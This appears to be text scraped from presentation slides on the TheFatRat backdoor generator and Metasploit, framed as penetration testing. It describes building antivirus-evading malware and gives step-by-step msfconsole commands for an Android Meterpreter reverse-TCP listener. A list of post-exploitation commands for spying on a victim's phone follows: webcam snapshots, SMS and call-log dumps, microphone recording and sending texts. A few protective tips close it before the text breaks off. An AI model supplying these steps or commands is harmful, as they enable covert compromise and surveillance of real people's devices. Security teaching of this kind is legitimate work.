The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
5. • Also called pentesting
• Testinga computer system/network /Webapplication to find
vulnerabilities.
Benefits:
• Intelligently managevulnerabilities
• Avoid thecost of networkdowntime
• Meet regulatory requirements
• Preservecorporate image and customerloyalty
Penetration Testing
6. MAIN TERMS
• EXPLOIT-a pieceof codewritten to take advantage of a
particular vulnerability inthe system.
• PAYLOAD-simplescriptsthat thehackersutilize to interact witha
hacked system.
• LHOST- TheIPaddressyouwantyourlistener to bind to.
• LPORT- Theport youwantyourlistenerto bind to.
• Meterpreter- advanced,dynamically extensiblepayload thatusesin
memorydll injection& extended overthen/w at runtime.
7. TheFatRat
• The FatRat a massive exploiting tool
• Easy tool to generate backdoor
• Create backdoor for android, windows and linux
• Author:EdoMaland
• Versions:1.9.6.
8. TheFatRat
• This tool compiles a malware with popular payload and then the
compiled malware can be execute on Android, Windows, Linux.
• The malware that created with this tool also have an ability to
bypass most AV software
• With the help of msfconsole we can access all files in the victim
device
9. Advantages
• Open source
• Frequently updated
• Easyto deploy userspecific exploit
Disadvantages
• Can crashyoursystemifnot used wisely
• Requiresdeep knowledge forexploitdevelopment
17. STEP 7: Set the multi/handler
Payload Handleris a module thatprovidesallthefeaturesof
themetasploitpayload systemtoexploit.
• msf > useexploit/multi/handler
STEP 8: Set the payload
• msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
18. STEP 9: Set the Local Host
The IP address you want your listener to bind to
• msf exploit(handler) > set LHOST 192.168.43.136
STEP 10: Set the Local Port
• msf exploit(handler) > set LPORT 4444
19. We can now interact with the victim & perform different
commands.
STEP 9: enter the command ‘Exploit’
20. Commands to Exploits Android
Device
webcam_snap - Take a snap shot.
webcam_stream- Play a video stream.
webcam_list - List the camera types in the device .
check_root- The device is rooted or not.
dump_calllog- View the call details.
dump_sms –To retrieve messages from victim’s phone.
set_audio_mode –Set the android device in silent to ringing
mode.
send_sms –Send message from victim’s to another.
record_mic-Record audio from victim’s phone using mic
sysinfo-Retrieve OS version of victim’s phone
21. CONCLUSION
• Keep your Android up to date.
• Installing antivirus software on your Android device.
• Never permanently enable installing of Apps from “Unknown
sources “.
• Never take your phone to important meetings or anywhere you
don't want people listening.
The backdoor application when installed and turned on the system
allows attacker to read, write and modify data. Cautions are: